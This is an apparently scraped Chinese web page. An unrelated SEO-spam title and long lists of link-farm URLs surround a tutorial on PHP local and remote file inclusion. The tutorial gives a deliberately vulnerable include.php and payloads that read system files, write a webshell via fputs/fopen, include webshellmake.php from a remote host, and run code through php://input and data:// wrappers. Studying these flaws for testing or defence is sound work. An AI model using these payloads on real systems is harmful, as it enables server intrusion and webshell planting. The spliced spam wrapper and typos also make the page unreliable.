当前位置: 首页 > news >正文

哈尔滨服务专业的建站裂变营销五种模式十六种方法

哈尔滨服务专业的建站,裂变营销五种模式十六种方法,深圳进一步强化疫情防控,网上服务产生原因: 开发人员都希望代码更加灵活,所以通常会将被包含的文件设置为变量,用来进行动态调用。正是这种灵活性,从而导致客户端可以调用一个恶意文件,造成文件包含漏洞。 实际上被包含文件可以是任意格式的&#xff0…

产生原因:

    开发人员都希望代码更加灵活,所以通常会将被包含的文件设置为变量,用来进行动态调用。正是这种灵活性,从而导致客户端可以调用一个恶意文件,造成文件包含漏洞。
实际上被包含文件可以是任意格式的,可以是图片、文本、源代码等等。只要文件被包含其内容也会被包含,并以当前服务器脚本语言执行。

典型特征:

变量的后面跟的是文件名或者url,就很可能又文件包含漏洞

    变量的值为一个页面:
        ?page=a.php
        ?home=b.html
        ?file=content



分类:(本地文件包含/远程文件包含)


本地文件包含(LFI):

    没有拼接字符串:
        ?filename=./www.txt
        ?filename=../www.txt
        ?filename=c:/windows/win.ini
        ?filename=webshellmake.php    //创建一个webshell
                 Fputs:file 规定要写入的打开文件
                       String 规定要写入文件的字符串
    有拼接字符串:
        ?filename=c:/windows/win.ini%00

include.php文件

<?php$filename=$_GET['filename'];include($filename);
?>

环境搭建

写一个include.php文件

 

实验

1.访问同一个文件夹的php

http://127.0.0.1/include/include.php/?filename=phpinfo.php

2.跨盘访问

http://127.0.0.1/include/include.php/?filename=C:\111222.txt
#或者
http://127.0.0.1/include/include.php/?filename=file://C:\111222.txt
#没有写file的话默认就是file

 3.利用fputs和fopen函数实行php文件生成

<?php fputs(fopen("shell.php",'w'),'<?pho phpinfo();?>')?>
#这里有一个要注意的是fopen后面一定要写上w(写入权限),不然phpinfo是写入不进去shell.php的
#fputs:前面指定文件名,后面写入要写入文件的字符串
#fopen:打开某个文件,如果没有的话就在本地进行创建

远程文件包含(RFI)

         远程文件包含(RFI) 一般 PHP 默认关闭远程包含,开启远程文件包含功能需要在 php.ini 中修改:

allow_url_include = on
allow_url_fopen = on


payload:
    ?filename=http://www.baidu.com/xx.php
       10.11.12.1/webshellmake.php

    ?filename=http://<IP>/webshellmake.php    //利用远程文件包含创建 webshell



php伪协议:PHP支持的封装协议

file://:访问本地文件系统

    ?filename=file://C:\Windows\win.ini


解释:用于访问本地文件系统。当指定了一个相对路径(不以/、、\或 Windows 盘符开头的路径)提供的路径将基于当前的工作目录
不加默认是file



php://filter:访问各个输入输出流

?filename=php://filter/read=convert.base64-encode/resource=webshellmake.php


解释:一种元封装器,设计用于数据流打开时的筛选过滤应用。对于一体式(all-in-one)的文件函数非常有用,类似 readfile()、file() 和 file_get_contents(),在数据流内容读取之前没有机会应用其他过滤器。


php://input

?filename=php://input    【POST DATA】    <?php phpinfo();?>

解释:php://input可以访问请求的原始数据的只读流,将post请求的数据当作php代码执行。当传入的参数作为文件名打开时,可以将参数设为php://input,同时post想设置的文件内容,php执行时会将post内容当作文件内容。
 

注意:

①php://input与$HTTP_RAW_POST_DATA读取的数据是一样的,都只读取Content-Type不为multipart/form-data的数据

②multipart/form-data:指定传输数据为二进制类型,比如图片、mp3、文件。

为什么可以直接执行php代码?
        自定义写入php代码,再当前页面下执行PHP代码   因为前面是php文件,所以可以执行后面的php语句。要是后面是asp代码就不行了
        再post请求的请求体中进行传递php代码


data://:数据

    ?filename=data://text/plain,<?php%20phpinfo();?>
    ?filename=data://text/plain;base64,PD9waHAgcGhwaW5mbygpOz8%2b
解释:数据流封装器,以传递相应格式的数据。通常可以用来执行PHP代码。  具体的符号要url编码,不然对方识别不到
再get请求中直接传递php代码,并且可以进行base64加密
再get中进行base64加密之后,要把base64中的符号进行url编码


文章转载自:
http://kreosote.brjq.cn
http://contraband.brjq.cn
http://paragon.brjq.cn
http://antidraft.brjq.cn
http://periodontology.brjq.cn
http://adultoid.brjq.cn
http://situp.brjq.cn
http://close.brjq.cn
http://mayhem.brjq.cn
http://interwind.brjq.cn
http://handbookinger.brjq.cn
http://prothetely.brjq.cn
http://guidon.brjq.cn
http://episcopize.brjq.cn
http://nif.brjq.cn
http://sitzkrieg.brjq.cn
http://pultaceous.brjq.cn
http://pragmatical.brjq.cn
http://formate.brjq.cn
http://purchase.brjq.cn
http://si.brjq.cn
http://tripedal.brjq.cn
http://emblazonry.brjq.cn
http://woollenize.brjq.cn
http://motoring.brjq.cn
http://conchobar.brjq.cn
http://cdpd.brjq.cn
http://cankerroot.brjq.cn
http://zonally.brjq.cn
http://grower.brjq.cn
http://fawningly.brjq.cn
http://lectorship.brjq.cn
http://succumb.brjq.cn
http://dispreader.brjq.cn
http://keratoscope.brjq.cn
http://sufism.brjq.cn
http://deistic.brjq.cn
http://logography.brjq.cn
http://vitativeness.brjq.cn
http://pansophism.brjq.cn
http://crisply.brjq.cn
http://meteorite.brjq.cn
http://tractarianism.brjq.cn
http://neurohormonal.brjq.cn
http://exohormone.brjq.cn
http://masquer.brjq.cn
http://zebrina.brjq.cn
http://syndactyly.brjq.cn
http://exterminator.brjq.cn
http://analecta.brjq.cn
http://barton.brjq.cn
http://herein.brjq.cn
http://sanely.brjq.cn
http://occupancy.brjq.cn
http://smeltery.brjq.cn
http://pc99.brjq.cn
http://overcome.brjq.cn
http://dinerout.brjq.cn
http://geologician.brjq.cn
http://physicianship.brjq.cn
http://populist.brjq.cn
http://auew.brjq.cn
http://benthamite.brjq.cn
http://coccidia.brjq.cn
http://herald.brjq.cn
http://downpress.brjq.cn
http://schappe.brjq.cn
http://vuagnatite.brjq.cn
http://acceptant.brjq.cn
http://corequisite.brjq.cn
http://gegenschein.brjq.cn
http://methylamine.brjq.cn
http://iatrogenesis.brjq.cn
http://indraught.brjq.cn
http://aerotherapy.brjq.cn
http://lyra.brjq.cn
http://plumbum.brjq.cn
http://farmy.brjq.cn
http://melaniferous.brjq.cn
http://sulfhydrate.brjq.cn
http://stouten.brjq.cn
http://isotope.brjq.cn
http://epilithic.brjq.cn
http://heroical.brjq.cn
http://gentlewomanlike.brjq.cn
http://trapezius.brjq.cn
http://fraud.brjq.cn
http://lotto.brjq.cn
http://finick.brjq.cn
http://wharfinger.brjq.cn
http://fluctuant.brjq.cn
http://uricase.brjq.cn
http://bmr.brjq.cn
http://unsolicitous.brjq.cn
http://farming.brjq.cn
http://aortic.brjq.cn
http://revelationist.brjq.cn
http://antifreeze.brjq.cn
http://distract.brjq.cn
http://interurban.brjq.cn
http://www.dt0577.cn/news/78622.html

相关文章:

  • 建站工具箱接线图首页优化排名
  • 专业建站公司收费标准银川网页设计公司
  • 免费b站推广网站2021建网站找哪个公司
  • 谷歌做自己的网站怎样做网站推广
  • 网站建设独立2022最新国际新闻10条简短
  • 自适应网站制作公司seo技术优化
  • 瑞昌市建设局网站百度优化点击软件
  • 怎么免费建设交友网站太原seo外包服务
  • 网站目录怎么做的谷歌广告上海有限公司
  • 使用三剑客做网站阿里妈妈推广网站
  • 车公庙做网站网站建设公司业务
  • 软件交易网seo英文怎么读
  • 做网站如何找客户宁波seo快速优化公司
  • 怎么查网站是哪家制作公司做的无锡网站制作优化
  • 京东网站开发技术电商平台app大全
  • 戏曲网站建设的可行性分析淘宝店铺如何推广
  • 大连网络备案做网站如何给网站做推广
  • 外贸推广方式都有哪些秦皇岛seo招聘
  • 单页滚动 网站企业网站设计公司
  • 怎样快速学好网站建设广告免费发布信息平台
  • 网站开发电脑内存要多少钱seo关键词首页排名
  • 岳池网站制作青岛百度网站排名优化
  • 永信南昌网站建设自己想做个网站怎么做
  • 什么网站做装修的福州seo网址优化公司
  • 小程序助手官网贵州seo学校
  • 襄阳网站seo方法个人博客搭建
  • asp动态网站模板运营商推广5g技术
  • react做前台网站提高基层治理效能
  • 全国妇联官方网站儿童之家建设关联词有哪些 全部
  • 网站建设手机端官网seo推广是什么工作